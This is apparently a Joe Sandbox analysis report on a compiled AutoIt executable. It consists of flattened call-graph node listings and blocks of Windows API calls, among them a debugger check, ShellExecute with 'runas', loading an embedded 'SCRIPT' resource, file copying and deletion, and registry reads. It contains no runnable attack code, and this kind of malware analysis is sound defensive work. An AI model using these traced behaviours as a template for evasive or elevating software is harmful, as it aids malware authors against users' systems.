Mailbox 59 API calls 101874->101876 101875 530db6 Mailbox 59 API calls 101877 517529 101875->101877 101876->101879 101878 530db6 Mailbox 59 API calls 101877->101878 101880 517552 101877->101880 101878->101880 101879->101875 101880->101849 101881->101864 101882->101864 101883->101858 101884->101849 102075 514bb5 101885->102075 101890 54d8e6 101892 514e4a 84 API calls 101890->101892 101891 514e08 LoadLibraryExW 102085 514b6a 101891->102085 101894 54d8ed 101892->101894 101896 514b6a 3 API calls 101894->101896 101899 54d8f5 101896->101899 101898 514e2f 101898->101899 101900 514e3b 101898->101900 102111 514f0b 101899->102111 101901 514e4a 84 API calls 101900->101901 101903 514e40 101901->101903 101903->101466 101903->101469 101906 54d91c 102119 514ec7 101906->102119 101910 517667 59 API calls 101909->101910 101911 5145b1 101910->101911 101912 517667 59 API calls 101911->101912 101913 5145b9 101912->101913 101914 517667 59 API calls 101913->101914 101915 5145c1 101914->101915 101916 517667 59 API calls 101915->101916 101917 5145c9 101916->101917 101918 54d4d2 101917->101918 101919 5145fd 101917->101919 101920 518047 59 API calls 101918->101920 101921 51784b 59 API calls 101919->101921 101922 54d4db 101920->101922 101923 51460b 101921->101923 102301 517d8c 101922->102301 101925 517d2c 59 API calls 101923->101925 101926 514615 101925->101926 101928 514640 101926->101928 101929 51784b 59 API calls 101926->101929 101927 514680 102288 51784b 101927->102288 101928->101927 101931 51465f 101928->101931 101941 54d4fb 101928->101941 101932 514636 101929->101932 101935 5179f2 59 API calls 101931->101935 101934 517d2c 59 API calls 101932->101934 101933 54d5cb 101937 517bcc 59 API calls 101933->101937 101934->101928 101938 514669 101935->101938 101936 514691 101939 5146a3 101936->101939 101942 518047 59 API calls 101936->101942 101949 54d588 101937->101949 101938->101927 101946 51784b 59 API calls 101938->101946 101940 5146b3 101939->101940 101943 518047 59 API calls 101939->101943 
101945 5146ba 101940->101945 101947 518047 59 API calls 101940->101947 101941->101933 101944 54d5b4 101941->101944 101957 54d532 101941->101957 101942->101939 101943->101940 101944->101933 101952 54d59f 101944->101952 101948 518047 59 API calls 101945->101948 101950 5146c1 Mailbox 101945->101950 101946->101927 101947->101945 101948->101950 101949->101927 101951 5179f2 59 API calls 101949->101951 102305 517924 59 API calls 2 library calls 101949->102305 101950->101497 101951->101949 101955 517bcc 59 API calls 101952->101955 101953 54d590 101954 517bcc 59 API calls 101953->101954 101954->101949 101955->101949 101957->101953 101958 54d57b 101957->101958 101959 517bcc 59 API calls 101958->101959 101959->101949 101961 517e4f 59 API calls 101960->101961 101962 5179fd 101961->101962 101962->101503 101962->101506 101964 57408d 101963->101964 101965 574092 101964->101965 101966 5740a0 101964->101966 101967 518047 59 API calls 101965->101967 101968 517667 59 API calls 101966->101968 102016 57409b Mailbox 101967->102016 101969 5740a8 101968->101969 101970 517667 59 API calls 101969->101970 101971 5740b0 101970->101971 101972 517667 59 API calls 101971->101972 101973 5740bb 101972->101973 101974 517667 59 API calls 101973->101974 101975 5740c3 101974->101975 101976 517667 59 API calls 101975->101976 101977 5740cb 101976->101977 101978 517667 59 API calls 101977->101978 101979 5740d3 101978->101979 101980 517667 59 API calls 101979->101980 101981 5740db 101980->101981 101982 517667 59 API calls 101981->101982 101983 5740e3 101982->101983 101984 51459b 59 API calls 101983->101984 101985 5740fa 101984->101985 101986 51459b 59 API calls 101985->101986 101987 574113 101986->101987 101988 5179f2 59 API calls 101987->101988 101989 57411f 101988->101989 101990 574132 101989->101990 101991 517d2c 59 API calls 101989->101991 101992 5179f2 59 API calls 101990->101992 101991->101990 101993 57413b 101992->101993 101994 57414b 101993->101994 101995 517d2c 59 API calls 101993->101995 101996 
518047 59 API calls 101994->101996 101995->101994 101997 574157 101996->101997 101998 517b2e 59 API calls 101997->101998 101999 574163 101998->101999 102307 574223 59 API calls 101999->102307 102001 574172 102308 574223 59 API calls 102001->102308 102003 574185 102004 5179f2 59 API calls 102003->102004 102016->101521 102018 579162 __write_nolock 102017->102018 102019 530db6 Mailbox 59 API calls 102018->102019 102020 5791bf 102019->102020 102021 51522e 59 API calls 102020->102021 102022 5791c9 102021->102022 102023 578f5f GetSystemTimeAsFileTime 102022->102023 102024 5791d4 102023->102024 102025 514ee5 85 API calls 102024->102025 102026 5791e7 _wcscmp 102025->102026 102027 57920b 102026->102027 102028 5792b8 102026->102028 102326 579734 102027->102326 102030 579734 96 API calls 102028->102030 102045 579284 _wcscat 102030->102045 102033 514f0b 74 API calls 102035 5792dd 102033->102035 102034 5792c1 102034->101527 102036 514f0b 74 API calls 102035->102036 102038 5792ed 102036->102038 102037 579239 _wcscat _wcscpy 102333 5340fb 58 API calls __wsplitpath_helper 102037->102333 102039 514f0b 74 API calls 102038->102039 102041 579308 102039->102041 102042 514f0b 74 API calls 102041->102042 102043 579318 102042->102043 102044 514f0b 74 API calls 102043->102044 102046 579333 102044->102046 102045->102033 102045->102034 102047 514f0b 74 API calls 102046->102047 102048 579343 102047->102048 102049 514f0b 74 API calls 102048->102049 102050 579353 102049->102050 102051 514f0b 74 API calls 102050->102051 102052 579363 102051->102052 102072->101454 102073->101490 102074->101504 102124 514c03 102075->102124 102078 514bdc 102080 514bf5 102078->102080 102081 514bec FreeLibrary 102078->102081 102079 514c03 2 API calls 102079->102078 102082 53525b 102080->102082 102081->102080 102128 535270 102082->102128 102084 514dfc 102084->101890 102084->101891 102209 514c36 102085->102209 102088 514b8f 102089 514ba1 FreeLibrary 102088->102089 102090 514baa 102088->102090 102089->102090 102092 
514c70 102090->102092 102091 514c36 2 API calls 102091->102088 102093 530db6 Mailbox 59 API calls 102092->102093 102094 514c85 102093->102094 102213 51522e 102094->102213 102096 514c91 _memmove 102097 514ccc 102096->102097 102098 514dc1 102096->102098 102099 514d89 102096->102099 102100 514ec7 69 API calls 102097->102100 102227 57991b 95 API calls 102098->102227 102216 514e89 CreateStreamOnHGlobal 102099->102216 102107 514cd5 102100->102107 102103 514f0b 74 API calls 102103->102107 102104 514d69 102104->101898 102106 54d8a7 102108 514ee5 85 API calls 102106->102108 102107->102103 102107->102104 102107->102106 102222 514ee5 102107->102222 102109 54d8bb 102108->102109 102110 514f0b 74 API calls 102109->102110 102110->102104 102112 54d9cd 102111->102112 102113 514f1d 102111->102113 102245 5355e2 102113->102245 102116 579109 102265 578f5f 102116->102265 102118 57911f 102118->101906 102120 54d990 102119->102120 102121 514ed6 102119->102121 102270 535c60 102121->102270 102123 514ede 102125 514bd0 102124->102125 102126 514c0c LoadLibraryA 102124->102126 102125->102078 102125->102079 102126->102125 102127 514c1d GetProcAddress 102126->102127 102127->102125 102131 53527c __alloc_osfhnd 102128->102131 102129 53528f 102177 538b28 58 API calls __getptd_noexit 102129->102177 102131->102129 102133 5352c0 102131->102133 102132 535294 102178 538db6 9 API calls __mbschr_l 102132->102178 102147 5404e8 102133->102147 102136 5352c5 102137 5352db 102136->102137 102138 5352ce 102136->102138 102140 535305 102137->102140 102141 5352e5 102137->102141 102179 538b28 58 API calls __getptd_noexit 102138->102179 102162 540607 102140->102162 102180 538b28 58 API calls __getptd_noexit 102141->102180 102144 53529f __alloc_osfhnd @_EH4_CallFilterFunc@8 102144->102084 102148 5404f4 __alloc_osfhnd 102147->102148 102149 539c0b __lock 58 API calls 102148->102149 102160 540502 102149->102160 102150 54057d 102187 53881d 58 API calls 2 library calls 102150->102187 102153 5405f3 __alloc_osfhnd 
102153->102136 102154 540584 102159 540576 102154->102159 102188 539e2b InitializeCriticalSectionAndSpinCount 102154->102188 102155 539c93 __mtinitlocknum 58 API calls 102155->102160 102158 5405aa EnterCriticalSection 102158->102159 102182 5405fe 102159->102182 102160->102150 102160->102155 102160->102159 102185 536c50 59 API calls __lock 102160->102185 102186 536cba LeaveCriticalSection LeaveCriticalSection _doexit 102160->102186 102163 540627 __wopenfile 102162->102163 102164 540641 102163->102164 102176 5407fc 102163->102176 102195 5337cb 60 API calls 2 library calls 102163->102195 102193 538b28 58 API calls __getptd_noexit 102164->102193 102166 540646 102194 538db6 9 API calls __mbschr_l 102166->102194 102168 535310 102181 535332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102168->102181 102169 54085f 102190 5485a1 102169->102190 102172 5407f5 102172->102176 102196 5337cb 60 API calls 2 library calls 102172->102196 102174 540814 102174->102176 102197 5337cb 60 API calls 2 library calls 102174->102197 102176->102164 102176->102169 102177->102132 102178->102144 102179->102144 102180->102144 102181->102144 102189 539d75 LeaveCriticalSection 102182->102189 102184 540605 102184->102153 102185->102160 102186->102160 102187->102154 102188->102158 102189->102184 102198 547d85 102190->102198 102192 5485ba 102192->102168 102193->102166 102194->102168 102195->102172 102196->102174 102197->102176 102199 547d91 __alloc_osfhnd 102198->102199 102200 547da7 102199->102200 102203 547ddd 102199->102203 102201 538b28 __mbschr_l 58 API calls 102200->102201 102202 547dac 102201->102202 102204 538db6 __mbschr_l 9 API calls 102202->102204 102205 547e4e __wsopen_nolock 109 API calls 102203->102205 102208 547db6 __alloc_osfhnd 102204->102208 102206 547df9 102205->102206 102207 547e22 __wsopen_helper LeaveCriticalSection 102206->102207 102207->102208 102208->102192 102210 514b83 102209->102210 102211 514c3f LoadLibraryA 102209->102211 102210->102088 102210->102091 102211->102210 
102212 514c50 GetProcAddress 102211->102212 102212->102210 102214 530db6 Mailbox 59 API calls 102213->102214 102215 515240 102214->102215 102215->102096 102217 514ea3 FindResourceExW 102216->102217 102221 514ec0 102216->102221 102218 54d933 LoadResource 102217->102218 102217->102221 102219 54d948 SizeofResource 102218->102219 102218->102221 102220 54d95c LockResource 102219->102220 102219->102221 102220->102221 102221->102097 102223 514ef4 102222->102223 102226 54d9ab 102222->102226 102228 53584d 102223->102228 102225 514f02 102225->102107 102227->102097 102229 535859 __alloc_osfhnd 102228->102229 102230 53586b 102229->102230 102231 535891 102229->102231 102241 538b28 58 API calls __getptd_noexit 102230->102241 102234 536c11 __lock_file 59 API calls 102231->102234 102233 535870 102242 538db6 9 API calls __mbschr_l 102233->102242 102236 535897 102234->102236 102243 5357be 83 API calls 5 library calls 102236->102243 102238 53587b __alloc_osfhnd 102238->102225 102239 5358a6 102244 5358c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102239->102244 102241->102233 102242->102238 102243->102239 102244->102238 102248 5355fd 102245->102248 102247 514f2e 102247->102116 102249 535609 __alloc_osfhnd 102248->102249 102250 53564c 102249->102250 102251 535644 __alloc_osfhnd 102249->102251 102255 53561f _memset 102249->102255 102252 536c11 __lock_file 59 API calls 102250->102252 102251->102247 102254 535652 102252->102254 102263 53541d 72 API calls 6 library calls 102254->102263 102261 538b28 58 API calls __getptd_noexit 102255->102261 102256 535639 102262 538db6 9 API calls __mbschr_l 102256->102262 102259 535668 102264 535686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102259->102264 102261->102256 102262->102251 102263->102259 102264->102251 102268 53520a GetSystemTimeAsFileTime 102265->102268 102267 578f6e 102267->102118 102269 535238 __aulldiv 102268->102269 102269->102267 102271 535c6c __alloc_osfhnd 102270->102271 102272 535c93 102271->102272 102273 535c7e 
102271->102273 102275 536c11 __lock_file 59 API calls 102272->102275 102284 538b28 58 API calls __getptd_noexit 102273->102284 102277 535c99 102275->102277 102276 535c83 102285 538db6 9 API calls __mbschr_l 102276->102285 102286 5358d0 67 API calls 6 library calls 102277->102286 102280 535c8e __alloc_osfhnd 102280->102123 102281 535ca4 102287 535cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102281->102287 102283 535cb6 102283->102280 102284->102276 102285->102280 102286->102281 102287->102283 102289 5178b7 102288->102289 102290 51785a 102288->102290 102292 517d2c 59 API calls 102289->102292 102290->102289 102291 517865 102290->102291 102293 517880 102291->102293 102294 54eb09 102291->102294 102298 517888 _memmove 102292->102298 102306 517f27 59 API calls Mailbox 102293->102306 102296 518029 59 API calls 102294->102296 102297 54eb13 102296->102297 102299 530db6 Mailbox 59 API calls 102297->102299 102298->101936 102300 54eb33 102299->102300 102302 517da6 102301->102302 102303 517d99 102301->102303 102304 530db6 Mailbox 59 API calls 102302->102304 102303->101928 102304->102303 102305->101949 102306->102298 102307->102001 102308->102003 102331 579748 __tzset_nolock _wcscmp 102326->102331 102327 514f0b 74 API calls 102327->102331 102328 579210 102328->102034 102332 5340fb 58 API calls __wsplitpath_helper 102328->102332 102329 579109 GetSystemTimeAsFileTime 102329->102331 102330 514ee5 85 API calls 102330->102331 102331->102327 102331->102328 102331->102329 102331->102330 102332->102037 102333->102045 102353->101563 102354->101535 102355->101550 102356->101545 102357->101551 102358->101561 102359->101564 102360->101568 102361->101309 102362->101308 102363->101172 102365 51b91a 102364->102365 102368 51bac7 102364->102368 102366 51bf81 102365->102366 102365->102368 102369 51b9fc 102365->102369 102375 51baab 102365->102375 102366->102375 102389 5194dc 59 API calls wcstoxq 102366->102389 102368->102366 102371 51bb46 102368->102371 102368->102375 102377 51ba8b 
Mailbox 102368->102377 102369->102371 102373 51ba38 102369->102373 102369->102375 102372 551361 102371->102372 102371->102375 102371->102377 102386 566e8f 59 API calls 102371->102386 102372->102375 102387 533d46 59 API calls __wtof_l 102372->102387 102373->102375 102373->102377 102379 5511b4 102373->102379 102375->101202 102377->101202 102377->102372 102377->102375 102388 518cd4 59 API calls Mailbox 102377->102388 102379->102375 102385 533d46 59 API calls __wtof_l 102379->102385 102380->101202 102381->101197 102382->101196 102383->101190 102384->101196 102385->102379 102386->102377 102387->102375 102388->102377 102389->102375 102390->101211 102391->101235 102392 511055 102397 512649 102392->102397 102395 532d40 __cinit 67 API calls 102396 511064 102395->102396 102398 517667 59 API calls 102397->102398 102399 5126b7 102398->102399 102404 513582 102399->102404 102402 512754 102403 51105a 102402->102403 102407 513416 59 API calls 2 library calls 102402->102407 102403->102395 102408 5135b0 102404->102408 102407->102402 102409 5135bd 102408->102409 102410 5135a1 102408->102410 102409->102410 102411 5135c4 RegOpenKeyExW 102409->102411 102410->102402 102411->102410 102412 5135de RegQueryValueExW 102411->102412 102413 513614 RegCloseKey 102412->102413 102414 5135ff 102412->102414 102413->102410 102414->102413 102415 537c56 102416 537c62 __alloc_osfhnd 102415->102416 102452 539e08 GetStartupInfoW 102416->102452 102418 537c67 102454 538b7c GetProcessHeap 102418->102454 102420 537cbf 102421 537cca 102420->102421 102537 537da6 58 API calls 3 library calls 102420->102537 102455 539ae6 102421->102455 102424 537cd0 102425 537cdb __RTC_Initialize 102424->102425 102538 537da6 58 API calls 3 library calls 102424->102538 102476 53d5d2 102425->102476 102428 537cea 102429 537cf6 GetCommandLineW 102428->102429 102539 537da6 58 API calls 3 library calls 102428->102539 102495 544f23 GetEnvironmentStringsW 102429->102495 102432 537cf5 102432->102429 102435 537d10 102436 537d1b 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00513B68
• IsDebuggerPresent.KERNEL32 ref: 00513B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,005D52F8,005D52E0,?,?), ref: 00513BEB
  • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
  • Part of subcall function 0052092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00513C14,005D52F8,?,?,?), ref: 0052096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00513C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005C7770,00000010), ref: 0054D281
• SetCurrentDirectoryW.KERNEL32(?,005D52F8,?,?,?), ref: 0054D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C4260,005D52F8,?,?,?), ref: 0054D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0054D346
  • Part of subcall function 00513A46: GetSysColorBrush.USER32(0000000F), ref: 00513A50
  • Part of subcall function 00513A46: LoadCursorW.USER32(00000000,00007F00), ref: 00513A5F
  • Part of subcall function 00513A46: LoadIconW.USER32(00000063), ref: 00513A76
  • Part of subcall function 00513A46: LoadIconW.USER32(000000A4), ref: 00513A88
  • Part of subcall function 00513A46: LoadIconW.USER32(000000A2), ref: 00513A9A
  • Part of subcall function 00513A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00513AC0
  • Part of subcall function 00513A46: RegisterClassExW.USER32(?), ref: 00513B16
  • Part of subcall function 005139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00513A03
  • Part of subcall function 005139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00513A24
  • Part of subcall function 005139D5: ShowWindow.USER32(00000000,?,?), ref: 00513A38
  • Part of subcall function 005139D5: ShowWindow.USER32(00000000,?,?), ref: 00513A41
  • Part of subcall function 0051434A: _memset.LIBCMT ref: 00514370
  • Part of subcall function 0051434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00514415
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%Z
• API String ID: 529118366-603944991
• Opcode ID: 3cd6f1de363f4f8dfb1c99d1480fab72eb80a655b8a6d70883ba7ea679ebfc68
• Instruction ID: edcd86ef0a66e38516a104239564e5d8ff904f3f85a8373d70d4c6100d4c6800
• Opcode Fuzzy Hash: 3cd6f1de363f4f8dfb1c99d1480fab72eb80a655b8a6d70883ba7ea679ebfc68
• Instruction Fuzzy Hash: D651077890910DEEEF21EBB8DC19EED7F74BF98304F004067F411A2291EA704A89DB61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 005149CD
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • GetCurrentProcess.KERNEL32(?,0059FAEC,00000000,00000000,?), ref: 00514A9A
                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00514AA1
                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00514AE7
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00514AF2
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00514B23
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00514B2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                      • String ID:
                                                                      • API String ID: 1986165174-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00514D8E,?,?,00000000,00000000), ref: 00514E99
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00514D8E,?,?,00000000,00000000), ref: 00514EB0
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F), ref: 0054D937
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F), ref: 0054D94C
                                                                      • LockResource.KERNEL32(00514D8E,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F,00000000), ref: 0054D95F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: pb]$%Z
                                                                      • API String ID: 3964851224-453358694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dd]$Dd]$Dd]$Dd]$Variable must be of type 'Object'.
                                                                      • API String ID: 0-869367157
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,0054E398), ref: 0057446A
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0057447B
                                                                      • FindClose.KERNEL32(00000000), ref: 0057448B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00520A5B
                                                                      • timeGetTime.WINMM ref: 00520D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00520E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00520E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00520EFA
                                                                      • DestroyWindow.USER32 ref: 00520F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00520F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00554E83
                                                                      • TranslateMessage.USER32(?), ref: 00555C60
                                                                      • DispatchMessageW.USER32(?), ref: 00555C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00555C82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb]$pb]$pb]$pb]
                                                                      • API String ID: 4212290369-2777755825

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00578F5F: __time64.LIBCMT ref: 00578F69
                                                                        • Part of subcall function 00514EE5: _fseek.LIBCMT ref: 00514EFD
                                                                      • __wsplitpath.LIBCMT ref: 00579234
                                                                        • Part of subcall function 005340FB: __wsplitpath_helper.LIBCMT ref: 0053413B
                                                                      • _wcscpy.LIBCMT ref: 00579247
                                                                      • _wcscat.LIBCMT ref: 0057925A
                                                                      • __wsplitpath.LIBCMT ref: 0057927F
                                                                      • _wcscat.LIBCMT ref: 00579295
                                                                      • _wcscat.LIBCMT ref: 005792A8
                                                                        • Part of subcall function 00578FA5: _memmove.LIBCMT ref: 00578FDE
                                                                        • Part of subcall function 00578FA5: _memmove.LIBCMT ref: 00578FED
                                                                      • _wcscmp.LIBCMT ref: 005791EF
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579824
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00579452
                                                                      • _wcsncpy.LIBCMT ref: 005794C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 005794FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579534
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                      • RegisterClassExW.USER32(00000030), ref: 0051309E
